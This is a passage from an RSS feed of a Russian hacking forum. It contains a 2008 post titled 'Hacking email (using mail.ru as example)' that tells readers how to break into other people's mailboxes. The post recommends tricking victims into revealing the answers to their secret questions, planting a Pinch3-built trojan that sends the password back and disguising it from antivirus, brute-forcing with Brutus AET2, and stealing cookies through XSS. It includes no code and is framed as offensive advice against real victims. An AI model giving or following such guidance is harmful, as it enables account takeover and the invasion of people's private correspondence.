						&lt;p&gt;========================================&lt;br /&gt;P.S Источник - Old.Antichat.Ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (HACK_ER)</author>
			<pubDate>Fri, 14 Nov 2008 23:00:58 +0300</pubDate>
			<guid>http://xakearth.mybb.ru/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>Взлом почты (на примере mail.ru)</title>
			<link>http://xakearth.mybb.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;Многих мучает вопрос - &amp;quot;Как взломать ящик на mail.ru?&amp;quot;. В Интернете очень много говорится о том что есть робот, который восстанавливает пароли, но надо и свой пароль прислать на мыло робота, чтоб его ввести в замешательство. Все это ЛОХОТРОН! Таким образом тот умник, который написал статью о роботе просто-напросто выманивает ваш пароль от ящика! В этой статье я вам расскажу какие основые способы взлома паролей существуют... Итак, начнем&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;Социальная Инженерия (далее СИ)&lt;/strong&gt; - Социальная Инженерия (сокращенно СИ) это нетехнический метод взлома, тоесть психологический. Для этого надо заставить жертву сказать ее пароль (или ответ на секретный вопрос), и чтобы жертва при этом не подозревала что ее хотят хакнуть. Например если секретный вопрос &amp;quot;Как зовут мою кошку&amp;quot;, вы разговариваете с жертвой, поднимаете тему о домашних животный, и спрашиваете &amp;quot;А как твою кошку зовут&amp;quot;, и он отвечает.... ответ на Секретный вопрос у НАС!!&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;Трой(или шпионские проги)&lt;/strong&gt; - для этого надо подсунуть жертве троян, который пришлет вам пароль от ящика на почту.. Трояны обычно делают на проге Pinch3(скачать можно в Интернете). Чтобы ее найти юзайте Google... Но почти все антивирусы палят эти трои, но конечно есть множество способов замаскировать их от антивирей, поэтому трои это хороший вариант....&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;Брутфорс&lt;/strong&gt; - это самый неэффективный метод взлома паролей, просто-напросто тупой перебор паролей. Самый лучший брутфорс считается Brutus AET2 (скачать ее можно в нашем каталоге файлов).&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;XSS&lt;/strong&gt; - это нахождение багов в веб-интерфейсе. Для того чтобы cookies жертвы пришли вам надо найти XSS. Об этом способе я вам расскажу в следующих статьях.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-style: italic&quot;&gt;P.S Все вышеперечисленные способы действуют не только на mail.ru&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (HACK_ER)</author>
			<pubDate>Fri, 14 Nov 2008 22:49:30 +0300</pubDate>
			<guid>http://xakearth.mybb.ru/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
